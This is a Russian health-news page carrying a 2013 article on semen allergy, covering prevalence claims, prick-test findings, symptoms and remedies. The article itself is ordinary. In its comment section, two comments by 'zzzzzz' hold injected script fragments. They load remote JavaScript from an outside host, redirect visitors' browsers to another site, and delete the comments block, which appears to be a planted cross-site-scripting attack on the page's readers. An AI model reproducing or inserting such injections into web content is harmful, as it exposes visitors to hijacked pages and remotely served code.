Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У каждой 10 женщины аллер...  >>  У каждой 10 женщины аллергия на сперму
 
Обратная связь
 

У каждой 10 женщины аллергия на сперму

Размер шрифта
20 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

У вас аллергия на кошечек? Не печальтесь: у 12%  женщин проблема посерьезнее: их иммунная система сходит с ума, когда контактирует с  мужской спермой! Что это за напасть и как с ней жить?

У каждой 10 женщины аллергия на сперму

«Хуже всего это состояние проявляется у молодых женщин, в возрасте 20-30 лет», – рассказывает доктор Майкл Кэролл, один из репродуктологов Манчестверского университета (Великобритания). «Для них также характерно раннее начало симптомов – либо тотчас же после воздействия эякулята, либо в течение часа после оного».

В числе симптомов аллергии на сперму называют зуд, высыпания, болезненное мочеиспускание, в тяжелых же случаях возможно развития анафилактического шока – смертельно опасного аллергического осложнения.

Кэролл утверждает, что, несмотря на незначительное количество диагностируемых случаев, эта проблема является довольно распространенной. Он и его коллеги проанализировали ряд обзорных работ и в итоге пришли к выводу, что двенадцать женщин из ста (12%) страдают этим недугом.

Сложность диагностики аллергии на сперму отчасти обуславливается тем фактом, что симптомы этой болезни весьма напоминают другие патологии, например, дерматит (воспаление кожи) и заболевания, передающиеся половым путем.

В ходе своего исследования доктор Кэролл применял так называемый прик-тест. Это аллергологическая проба, в ходе которой на кожу сначала наносится капля аллергена, а затем в этом месте производится прокол специальным ланцетом. Если организм демонстрирует повышенную чувствительность к данному аллергену, в месте прокола разовьется покраснение и отек.

В качестве аллергенов доктор Кэролл использовал разделенные фракции спермы: семенную жидкость и сперматозоиды.

Оказалось, что иммунная система агрессивно реагирует в отношении именно семенной жидкости, но не мужских половых клеток. Это объясняет, почему смена полового партнера не помогает избавиться от аллергии: гликопротеины семенной жидкости однотипны у всех мужчин, в отличие от сперматозоидов, которые являются структурно уникальными клетками.

С другой стороны, это влечет за собой и хорошие новости: аллергия на сперму, даже в самых тяжелых вариантах, оставляет женщине шанс забеременеть с помощью вспомогательных репродуктивных технологий.

Избежать неприятных симптомов аллергии можно двумя способами: половым воздержанием (это не наш вариант, верно?) и использованием презерватива. В обоих случаях предотвращается попадание спермы в половые пути женщины.

«В дополнение к физическому дискомфорту, который связан с аллергией на сперму, эта патология приводит и к психологическим проблемам, потому что женщины начинают серьезно переживать относительно того, что эта аллергия может разрушить их отношения и не позволит им завести детей», – рассказывает доктор Кэролл. «Однако современные репродуктивные технологии почти всегда позволяют решить эту  проблему».

Поэтому не затягивайте с визитом к доктору, если подозреваете у себя аллергию на сперму!

Ну а если вас беспокоят другие вопросы касательно женского здоровья, обязательно посетите наш тематический специальный проект!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Кошмар! Сперма – антидепрессант!   Аллергия и мигрень связаны!   Нежданные причины аллергии   Еда, которая ухудшает аллергию  
27 июня 201320 часов телевизора в неделю – вполовину меньше спермы! Как дальше жить? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
10 признаков, что аллергия побеждает вас
Как снова хотеть секса
Еда и лекарства: когда их нельзя смешивать

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.